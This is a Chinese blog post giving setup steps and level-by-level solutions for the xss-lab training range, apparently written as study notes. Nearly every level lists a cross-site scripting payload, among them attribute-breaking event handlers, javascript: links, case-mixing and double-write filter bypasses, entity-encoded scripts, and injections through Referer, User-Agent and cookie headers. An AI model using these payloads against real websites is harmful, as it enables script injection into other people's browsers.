xss-lab靶场搭建+题目解答

已于 2023-07-27 20:08:21 修改
阅读量167 收藏
点赞数
分类专栏: 渗透 文章标签: xss
于 2023-07-25 20:20:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/131924456
版权

目录

xss-lab靶场搭建

xss-lab题目+解答

level1

level2

level3

level4

level5

level6

level7

level8

level9

level10

level11

level12

level13

level16

xss-lab靶场搭建

 在www目录下放入文件xss-lab

xss-lab题目+解答

level1

<script>slert(1)</script>

level2

标签闭合

 " οnclick="alert(1)

level3

绕过htmlspecials()

12' οnclick='alert(1)

level4

闭合
11" οnclick="alert(1)

123" οnclick=alert(1)//

level5

伪协议和标签

11"><a href="javascript:alert(1)">

level6

大小写绕过

123"><sCript>alert(1)</scRipt>

level7

双写绕过

123"><scrscriptipt>alert(1)</scrscriptipt>

level8

a标签href伪协议+url编码,url编码会被浏览器自动解码

javascript:alert(1)

编码后为:

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

 

level9

编码+字符串

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;('http://')

level10

将hidden标签覆盖

?t_sort=1" οnmοuseοver="alert(1)" type='text'

level11

Referer,覆盖hidden标签

111" οnmοuseοver='alert(1)' type='text'

需要在level10进行跳转 

 使用brup抓包

修改Referer

 修改完后level11完成

level12

user-agent,覆盖hidden标签

111" οnmοuseοver='alert(1)' type='text'

使用brup抓包 

 修改User-Agent

 成功通过level12

 

level13

cookie,覆盖hidden标签

111" οnmοuseοver='alert(1)' type='text'

 使用brup抓包 

  修改cookie

  成功通过level13

level16

将script替换为空格,然后所有空格替换为 

解决方法,使用其他不含script的标签以及替代空格的方式

<img%0asrc="1"%0aοnerrοr=alert(1)>

Serein_NSQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-lab全通关教程
05-07
xss-lab全通关教程,共有20个关,全部就压缩到文件里,另外购买还有可以私信博主,赠送xss环境
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 4876
XSS-LabXSS注入笔记1-16)
xss-lab靶场详解
LS_Sy的博客
03-22 897
pass1-pass4在中已经写过,便不再赘述。
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1382
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
xss-lab通关之路
黑白的博客
10-12 3748
xss-lab通关之路
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 3313
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
xss-lab靶场资源包
07-27
xss-lab靶场资源包
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs为WEB渗透中跨站脚本攻击专项练习靶场,内含多种攻击方式,采用关卡制,由易到难,适合刚接触该漏洞的新手巩固练习
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
xss-labs靶场通关
10-13
xss-labs靶场通关
XSS-LabXSS注入教程)
DMXA的博客
11-01 207
解题思路:先观察题目的类型,猜哪个地方可以存在注入,代码分析这个可以交给chatgpt,下面就可以尝试自己构造好的payload 做了10题下来,发现难度是依次上升的解题思路:先观察题目的类型,猜哪个地方可以存在注入,然后是代码分析,这个可以交给chatgpt,下面就可以尝试自己构造好的payload,也可以进行BP抓包看下具体数据,或者指纹识别查一下框架是否有历史漏洞, XSS常用的标签:
XSS-lab通关记录
zjnu_y3s的博客
04-11 2095
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
[网络安全]xss-labs 本地靶场搭建详细教程
等风来
08-03 3194
PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。在URL栏输入localhost/xss-labs-master或者输入127.0.0.1/xss-labs-master。自此,xss-labs靶场搭建成功。安装完成后打开PhpStudy。
XSS-Lab靶场
Poolhuang的博客
08-09 857
XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际上这个请求是在被攻击者不知情的情况下发起的,由此攻击者在一定程度上达到了冒充被攻击者的目的。...
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4162
web靶场-xss-labs靶机平台的搭建和代码审计
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细)
m0_69583059的博客
01-23 1693
对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场,演示搭建环境:win11系统+phpstudy。
XSS靶场实战
qq_62803993的博客
01-09 706
云演靶场
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9162
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 2956
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值